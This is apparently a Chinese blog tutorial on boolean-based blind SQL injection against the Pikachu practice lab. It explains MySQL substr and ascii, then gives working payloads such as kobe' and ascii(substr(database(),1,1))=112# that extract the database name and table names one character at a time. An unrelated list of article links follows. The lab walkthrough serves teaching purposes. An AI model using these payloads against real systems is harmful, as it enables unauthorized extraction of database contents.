当前位置: 首页 > news >正文

11.SQL注入-盲注基于(base on boolian)

news 来源:原创 2024/7/7 23:26:26

SQL注入-盲注基于boolian案例利用

首先总结一下sql语句中的函数意思

#查看当前所在的数据库
mysql> select database();
+------------+
| database() |
+------------+
| pikachu    |
+------------+
1 row in set (0.00 sec)#函数substr里1是从第几位开始取字符,2是取多少个字符
mysql> select substr(database(),1,2);
+------------------------+
| substr(database(),1,2) |
+------------------------+
| pi                     |
+------------------------+
1 row in set (0.00 sec)#函数ascii是将字符转换为数字,注释:p转换数字是112
mysql> select ascii(substr(database(),1,1));
+-------------------------------+
| ascii(substr(database(),1,1)) |
+-------------------------------+
|                           112 |
+-------------------------------+
1 row in set (0.00 sec)#做比较,显然112>113不成立,则为假,即:0
mysql> select ascii(substr(database(),1,1))>113;
+-----------------------------------+
| ascii(substr(database(),1,1))>113 |
+-----------------------------------+
|                                 0 |
+-----------------------------------+
1 row in set (0.00 sec)#做比较,显然112>111成立,则为真,即:1
mysql> select ascii(substr(database(),1,1))>111;
+-----------------------------------+
| ascii(substr(database(),1,1))>111 |
+-----------------------------------+
|                                 1 |
+-----------------------------------+
1 row in set (0.00 sec)mysql>

盲注boolian类型
输入的内容是否正确,返回的信息比较少,只有两种返回结果:正确或者是用户名不存在
输入kobe直接返回正确的信息,输入kobe’ and 1=1#也返回了正确的信息,证明and被后台执行了
注释:and符号表示:前后都为真则输出正确的信息
在这里插入图片描述

输入kobe’ and 1=2#,则显示用户不存在,意思就是前面为真,后面为假,则结果为假,如图所示:
在这里插入图片描述

通过上面的图例子,我们可以利用左右都为真,则判断数据库名称的字符,多次进行测试

kobe' and ascii(substr(database(),1,1))=112#

根据payload语句执行成功,则可以判断出数据库第一个字符ascii=112,转换成字符为p
注释:这个方法虽然满了一点,但是一点一点测试会把数据库信息都爆出来的
在这里插入图片描述

现在则继续测试第二个字符,我这里是多次测试得出来得结果105转换字符为:i

kobe' and ascii(substr(database(),2,1))=105#

如图所示:结果为真
在这里插入图片描述

table_name=database()等于table_name=‘pikachu’
同样也可以进行爆出该数据库下的表名的字符,数字为104转成字符为h

kobe' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=104#

如图所示,执行成功
在这里插入图片描述

我这里就不依次进行测试了,查到的第一个字符为h
在这里插入图片描述

相关文章:

  • sharepoint api 没有这个文件所属site的权限的情况下访问指定文件
  • 脑启发设计:人工智能的进化之路
  • 深入理解计算机系统 CSAPP 家庭作业8.26
  • RPM方式安装mysql
  • 无法解析的外部符号 _imp_XXX
  • 基于Hadoop平台的电信客服数据的处理与分析④项目实现:任务15:数据生产
  • 【unity实战】使用Unity实现动作游戏的攻击 连击 轻重攻击和打击感
  • 航空数据管控系统-①项目准备阶段:任务2:项目技术预研(技术架构)
  • 对标 GPT-4o 的开源实时语音多模态模型:Moshi
  • 【BUUCTF-PWN】9-ciscn_2019_n_8
  • Matplotlib 简介
  • 康姿百德磁性床垫好不好,效果怎么样靠谱吗
  • Hadoop集群搭建
  • threejs 微信小程序原生版本的使用 obj模型的加载
  • 学会python——用python制作一个登录和注册窗口(python实例十八)
  • 【面试系列】之二:关于js原型
  • 10个最佳ES6特性 ES7与ES8的特性
  • Apache Spark Streaming 使用实例
  • CentOS7 安装JDK
  • CSS实用技巧
  • ECMAScript入门(七)--Module语法
  • golang中接口赋值与方法集
  • JavaScript-Array类型
  • mysql 数据库四种事务隔离级别
  • NLPIR语义挖掘平台推动行业大数据应用服务
  • PHP CLI应用的调试原理
  • PHP那些事儿
  • php中curl和soap方式请求服务超时问题
  • windows下如何用phpstorm同步测试服务器
  • -- 查询加强-- 使用如何where子句进行筛选,% _ like的使用
  • 基于HAProxy的高性能缓存服务器nuster
  • 蓝海存储开关机注意事项总结
  • 突破自己的技术思维
  • 我与Jetbrains的这些年
  • 限制Java线程池运行线程以及等待线程数量的策略
  • 400多位云计算专家和开发者,加入了同一个组织 ...
  • ​LeetCode解法汇总1410. HTML 实体解析器
  • ​LeetCode解法汇总2304. 网格中的最小路径代价
  • ​LeetCode解法汇总307. 区域和检索 - 数组可修改
  • #我与Java虚拟机的故事#连载07:我放弃了对JVM的进一步学习
  • ()、[]、{}、(())、[[]]等各种括号的使用
  • (27)4.8 习题课
  • (3)(3.5) 遥测无线电区域条例
  • (3)Dubbo启动时qos-server can not bind localhost22222错误解决
  • (Java实习生)每日10道面试题打卡——JavaWeb篇
  • (NO.00004)iOS实现打砖块游戏(九):游戏中小球与反弹棒的碰撞
  • (void) (_x == _y)的作用
  • (八)Docker网络跨主机通讯vxlan和vlan
  • (分享)自己整理的一些简单awk实用语句
  • (转)Linux NTP配置详解 (Network Time Protocol)
  • .[hudsonL@cock.li].mkp勒索加密数据库完美恢复---惜分飞
  • .net core 控制台应用程序读取配置文件app.config
  • .Net Web窗口页属性
  • .net 发送邮件
  • .NET/C# 利用 Walterlv.WeakEvents 高性能地定义和使用弱事件